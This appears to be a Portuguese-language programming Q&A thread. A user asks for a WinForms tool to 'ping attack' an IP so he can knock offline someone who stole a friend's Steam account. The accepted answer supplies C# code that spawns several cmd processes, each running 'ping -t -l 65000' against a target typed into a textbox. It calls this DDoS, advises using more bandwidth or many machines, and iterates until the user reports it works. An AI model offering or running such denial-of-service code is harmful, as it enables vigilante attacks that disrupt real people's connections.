# c# como fazer um ataque ping o ip de um computador

Tags: c#

Olá a todos eu precisava de saber como posso fazer um ataque ping a um ip usando winforms alguém pode ajudar me é que alguém roubou a conta steam a um amigo?

Comment: Desculpa a minha ignorância, mas me diga uma coisa: você pretende recuperar essa conta com isso? Como?

Comment: vou deitar a baixo para nao dexer de rank nem nada disso ele continua com acesso a conta nem vender skins

Comment: Você sabe que os IP's de internet se renovam quando o modem é reiniciado, né?

Comment: sim mas é so hoje ele ja volta daqui a umas horas

Answer (score 5, accepted):

você pode tentar algo do tipo

```
private void button1_Click(object sender, EventArgs e)
    {
        Pekiradu(textBox1.Text);
    }

    private static void Pekiradu(string destino)
    {
        System.Diagnostics.Process proc;
        int i = 0;
        string cmd = $"/C ping {destino} -t -l 65000";
        for (i = 0; i < 5; i++)
        {
            proc = new System.Diagnostics.Process();
            proc.EnableRaisingEvents = false;
            proc.StartInfo.FileName = "cmd";
            proc.StartInfo.Arguments = cmd;
            proc.Start();
        }
    }
```

Só que você ira precisar ter uma internet superior ao destino que está sendo atacado, ou ter muitos outros computadores em redes diferentes disparando esse `ping` para o mesmo destino.

Basicamente o que você está tentando criar é um [Ddos](https://pt.wikipedia.org/wiki/Ataque_de_nega%C3%A7%C3%A3o_de_servi%C3%A7o)

Comment: obrigado mas nao há nenhuma maneira de fazer com que se possa editar no winform o ip e o 65000 <-(nao sei o nome disto)

Comment: Então, fiz uma adaptação no código, coloquei tudo dentro de uma função, é só no evento do botão você chamar essa função e passar o valor digitado no Edit

Comment: sim mas o que eu queria tambem se soubesse é por exemplo o ip ser editado numa textbox

Comment: Editei a resposta, adicionei como passar o valor digitado no textBox1 como parâmetro pro método Pingar.

Comment: esta a dar obrigado :D